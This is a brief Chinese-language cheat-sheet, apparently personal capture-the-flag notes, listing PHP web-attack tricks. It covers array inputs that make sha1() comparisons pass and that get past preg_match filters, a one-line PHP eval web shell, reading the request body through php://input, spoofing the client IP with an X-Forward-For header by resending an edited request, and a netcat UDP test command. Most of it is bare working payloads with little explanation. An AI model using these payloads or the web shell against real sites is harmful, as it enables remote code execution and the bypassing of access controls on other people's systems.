sha1相同的字符串
php sha1对于数组返回NULL,可以传入数组即可
var1[]=0,1
var2[]=0,2
跳过preg_match
使用数组即可跳过检查
var1[]='<?php eval($_REQUEST[5]);?>'
file_get_contents
php://input
可以读入body内信息,即便使用GET请求,也是可以带body的,所以用这种方式可以在GET和POST请求中加入字符串。
在firefox中右键选择编辑并重发
该网络包即可。
伪造ip
在firefox中可以编辑网络包并重新发送,在其中加入
X-Forward-For: [ip]
测试udp端口
echo "Hello World\!" | nc -4u ip port